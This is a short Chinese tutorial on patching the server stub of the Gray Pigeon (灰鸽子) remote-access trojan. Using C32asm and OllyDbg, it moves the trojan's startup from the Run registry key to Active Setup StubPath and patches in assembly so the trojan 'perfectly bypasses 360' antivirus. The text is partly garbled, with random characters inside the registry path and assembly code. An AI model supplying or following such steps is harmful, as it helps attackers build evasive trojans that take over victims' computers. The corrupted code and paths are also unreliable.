1、生成灰鸽子木马服务器端
2、灰鸽子木马服务器端写入注册表内容
3、灰鸽子木马载入C32asm软件工具
4、按ctrl+F,在搜索栏中输入software\microsoft\windows\currentversion\run
5、这里不是我们修改的地方 点击“下一个”
6、我们进行修改:把software改成stubpath
7、选定部分(如图)填充老揉孟阼写入software\microsoft\activesteup\installedcomponents\{926a36a-158b-047a-d148b0369c18;如图
8、把灰鸽子木马载入Ollydbg.exe
9、找到RUN启动代码修改成activeX启动如果有人找不到的话 右键-选择 超级字符查找-选择unicode 如图2所示,
10、找到目标:选定stubpath software\microsoft\active setup\installed commponets
11、右键 跟随
12、在NOP掉 部分指令
13、然后写入 汇编指令:MOV ECX,0048BDF8MOV EDX,0048B苇质缵爨E01MOV EAX,80000002CALL 4MOV EA淌捌釜集X,DWORD PTR DS:[48E614]CMP BYTE PTR DS:[EAX],0JE SHORT 0048BD7E从第一个NOP开始写起。写完之后保存即可 。好了,我们完美过360的鸽子已经基本成型。。。
14、测试
